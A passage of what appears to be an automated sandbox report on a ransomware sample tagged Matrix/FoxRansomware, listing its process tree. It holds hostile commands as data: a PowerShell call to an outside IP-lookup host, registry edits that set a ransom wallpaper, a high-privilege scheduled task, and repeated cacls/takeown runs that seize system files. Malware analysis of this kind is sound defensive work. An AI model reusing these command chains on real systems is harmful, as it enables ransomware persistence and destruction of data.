cacls.exe PID 3812 wrote to memory of 4372 3812 cmd.exe cacls.exe PID 3812 wrote to memory of 4372 3812 cmd.exe cacls.exe PID 3812 wrote to memory of 5336 3812 cmd.exe takeown.exe PID 3812 wrote to memory of 5336 3812 cmd.exe takeown.exe PID 3812 wrote to memory of 5336 3812 cmd.exe takeown.exe PID 3812 wrote to memory of 5260 3812 cmd.exe cmd.exe PID 3812 wrote to memory of 5260 3812 cmd.exe cmd.exe PID 3812 wrote to memory of 5260 3812 cmd.exe cmd.exe PID 5260 wrote to memory of 5280 5260 cmd.exe tm9TVtDr.exe PID 5260 wrote to memory of 5280 5260 cmd.exe tm9TVtDr.exe PID 5260 wrote to memory of 5280 5260 cmd.exe tm9TVtDr.exe PID 3812 wrote to memory of 5372 3812 cmd.exe tm9TVtDr.exe PID 3812 wrote to memory of 5372 3812 cmd.exe tm9TVtDr.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWZMgl5M.exe"2⤵PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWZMgl5M.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWZMgl5M.exe" -n2⤵
- Executes dropped EXE
PID:5040
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\7RwGqa0f.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\KH0E6zhK.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\KH0E6zhK.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3960
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:4564
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:3436
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9XcJxuj1.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\9XcJxuj1.vbs"3⤵
- Checks computer location settings
PID:4612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\GGYoc9tA.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:5892
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\GGYoc9tA.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:5464
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:6132
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:2680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\tm9TVtDr64.exetm9TVtDr.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵PID:5336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:5260 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:5280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""2⤵PID:5452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C3⤵PID:5776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"3⤵
- Modifies file permissions
PID:5900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "ActivitiesCache.db" -nobanner3⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "ActivitiesCache.db" -nobanner4⤵
- Executes dropped EXE
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵PID:5452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "classes.jsa" -nobanner3⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:4296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "classes.jsa" -nobanner3⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5972
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:4564
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:5852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "behavior.xml" -nobanner3⤵PID:3492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:5928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:5776
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:5700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:6004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵
- Executes dropped EXE
PID:4276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:5644
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:4920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "behavior.xml" -nobanner3⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:2804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml""2⤵PID:3924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml" /E /G Admin:F /C3⤵PID:5344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\uk-UA\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:2088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:4772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "AssemblyList_4_extended.xml" -nobanner4⤵
- Executes dropped EXE
PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5716
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:5352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "background.png" -nobanner3⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:4296
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:2916
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:5196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:5556
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:5752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:5704
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:5780
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵
- Executes dropped EXE
PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:3804
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:4296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5588
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "watermark.png" -nobanner3⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:2908
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:1288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:5236
-
